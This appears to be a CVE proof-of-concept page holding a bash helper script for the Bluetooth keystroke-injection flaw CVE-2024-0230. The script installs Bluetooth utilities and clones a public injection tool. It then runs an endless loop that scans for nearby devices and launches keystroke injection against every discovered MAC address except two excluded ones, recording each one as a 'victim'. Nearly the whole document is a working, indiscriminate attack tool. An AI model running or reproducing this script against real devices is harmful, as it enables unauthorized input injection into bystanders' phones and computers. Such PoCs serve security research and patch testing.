4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-0230
README.md
Rendering markdown...
POC / poc.sh SH
⬇ Raw GitHub ✕ Close 
#!/bin/bash
clear
#set -x
#------------------------------------------------
# Banner for the 1337'ishness
#------------------------------------------------
cat << "EOF"

HELPER SCRIPT FOR TESTING THE
BLUETOOTH POC CVE-2024-0230 

EOF
#------------------------------------------------
# Variables
#------------------------------------------------
RFKILL="/usr/sbin/rfkill"
HCITOOL="/usr/bin/hcitool"
HCICONFIG="/usr/bin/hciconfig"
#------------------------------------------------
# Arrays
#------------------------------------------------
declare -A mac_list     # Found MAC addresses and their associated data
declare -A exclude_list # Exclude MAC addresses
declare -A victims_list # List of victims we have attacked
#------------------------------------------------
# Exclude list of MAC's NOT to attack
#------------------------------------------------
exclude_list["58:1C:F8:09:9A:F2"]=1 # Illuminati-PC
exclude_list["78:64:C0:1E:FA:42"]=1 # Illuminati-4G
#------------------------------------------------
# PRE
#------------------------------------------------
# Only run as user root
if  [ ${UID} -ne 0 ]; then 
 printf "\n### ERROR - This script must run as user root (or with sudo)\n\n"
 exit 1
fi
# Ensure script is run with a bash version that supports associative arrays
if [[ "${BASH_VERSINFO:-0}" -lt 4 ]]; then
 echo "Bash version 4.0 or later is required."
 exit 1
fi
# Install needed utils
for PACKET in python3-bluez python3-pydbus rfkill bluez git; do 
 if [ $(dpkg -l ${PACKET} 2>/dev/null | grep -c "^ii  ${PACKET}") -eq 0 ]; then 
  printf "%-50s" "Installing ${PACKET}"
  apt-get update -qq -y > /dev/null 2>&1 & apt-get install -y -qq ${PACKET} > /dev/null 2>&1
  if [ $(dpkg -l ${PACKET} 2>/dev/null | grep -c "^ii  ${PACKET}") -eq 0 ]; then 
   echo "[FAILED]"
   printf "\nInstallation of ${PACKET} failed!\n\n"
   exit 1
  else
   echo "[OK]"
  fi
 fi
done
# Check if utilities exist
for UTIL in ${HCITOOL} ${HCICONFIG} ${RFKILL}; do
 if [ ! -x ${UTIL} ]; then 
  printf "\n### ERROR - Could not find ${UTIL}\n\n"
  exit 1
 fi
done
#------------------------------------------------
# Download POC scripts
#------------------------------------------------
if [ ! -d hi_my_name_is_keyboard ]; then 
 printf "%-50s" "Git-Cloning /marcnewlin/hi_my_name_is_keyboard"
 git clone -q https://github.com/marcnewlin/hi_my_name_is_keyboard 
 echo "[OK]"
fi
cd hi_my_name_is_keyboard
#------------------------------------------------
# TRAP
#------------------------------------------------
trap '
 printf -- "\n--------------------------------------------------------------------------------------\n"
 printf "$(date) - Attack stopped\n"
 printf -- "--------------------------------------------------------------------------------------\n"
 if [ ${STOP_BLUETOOTH:-0} -ne 0 ]; then 
  systemctl stop bluetooth > /dev/null 2>&1
 fi
 if [ ${#mac_list[@]} -ne 0 ]; then
  printf "\nSummary of Attacked Devices:\n"
  printf -- "--------------------------------------------------------------------------------------\n"
  for mac in "${!mac_list[@]}"; do
   echo "MAC: $mac Data: ${mac_list[$mac]}"
  done
  printf -- "--------------------------------------------------------------------------------------\n"
 fi
' exit
#------------------------------------------------
# MAIN
#------------------------------------------------
# Start bluetooth service
if [ $(systemctl is-active bluetooth|grep -c ^active) -eq 0 ]; then 
 printf "%-50s" "Startng bluetooth service"
 STOP_BLUETOOTH=1
 systemctl start bluetooth > /dev/null 2>&1
 if [ $(systemctl is-active bluetooth|grep -c ^active) -eq 0 ]; then 
  echo "[FAILED]"
  exit 1
 fi
 echo "[OK]"
fi
#------------------------------------------------
# Rfkill Unblock bluetoooth
#------------------------------------------------
if [ $(${RFKILL} --noheadings -o SOFT,HARD list bluetooth|tr ' ' '\n'|grep -v ^$|grep -c ^blocked) -ne 0 ]; then 
 printf "%-50s" "Running \"rfkill unblock bluetooth\""
 ${RFKILL} unblock bluetooth > /dev/null 2>&1
 echo "[OK]"
fi
sleep 1
#------------------------------------------------
# Ensure HCI device is up (on)
#------------------------------------------------
activated=0
for HCI in $(${HCICONFIG}|grep ^hci|cut -d ':' -f1|awk '{print $1}'); do 
 ${HCICONFIG} ${HCI} up > /dev/null 2>&1
 ((activated++))
done
if [ ${activated:-0} -eq 0 ]; then 
 printf "### An error occoured - HCI device not responding\n\n"
 exit 1
fi
#------------------------------------------------
# FUNCTIONS
#------------------------------------------------
is_this_a_known_mac() { # Function to check if a MAC address is in the array
 local mac=$1
 [[ -n "${mac_list[$mac]}" ]]
}
#------------------------------------------------
# SCAN AND EXPLOIT
#------------------------------------------------
echo ""
printf -- "--------------------------------------------------------------------------------------\n"
printf "$(date) - Starting attack\n"
printf -- "--------------------------------------------------------------------------------------\n"
attacked=0
printf "%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "0" "0" "0"
while true; do
 scanning_data=$(${HCITOOL} scan | grep -v ^Scanning) # Perform the scan and filter out the header line
 new_macs_found=0
 while IFS= read -r line; do # Process each found MAC address and format it
  formatted_line=$(echo "$line" | sed -E 's/^[[:space:]]*([0-9A-F:]{17})[[:space:]]*(.*)$/\1,\2/')
  mac=$(echo "$formatted_line" | awk -F, '{print $1}')
  data=$(echo "$formatted_line" | awk -F, '{print $2}')
  if [[ -n "$mac" && -n "$data" ]]; then
   if ! is_this_a_known_mac "$mac"; then 
    mac_list["$mac"]="$data"
    ((new_macs_found++))
    NEW=1
   fi
  fi
 done <<< "$scanning_data"
 #------------------------------------------------
 if [ ${#mac_list[@]} -ne 0 ] && [ ${NEW:-0} -eq 1 ]; then
  if [ ! -n "${exclude_list[$mac]}" ] && [ ! -n "${victims_list[$mac]}" ] ; then
   NEW=0
   printf "\n%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "${#mac_list[@]}" "${new_macs_found}" "${attacked}"
   #------------------------------------------------
   # Attack
   #------------------------------------------------
   for HCI in $(${HCICONFIG}|grep ^hci|cut -d ':' -f1|awk '{print $1}'); do 
   printf "\n\n%-50s\n" "Attacking ${mac} | ${data}"
   ((attacked++))
   printf -- "--------------------------------------------------------------------------------------\n"
   timeout 30 ./keystroke-injection-android-linux.py -i ${HCI} -t ${mac}
   victims_list["${mac}"]=1 # Add the target to the victims list so we do not attack them more than 1 time.
   printf "\n"
   printf "%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "${#mac_list[@]}" "0" "${attacked}"
   done
  fi
 fi
done
#------------------------------------------------
# END OF SCRIPT
#------------------------------------------------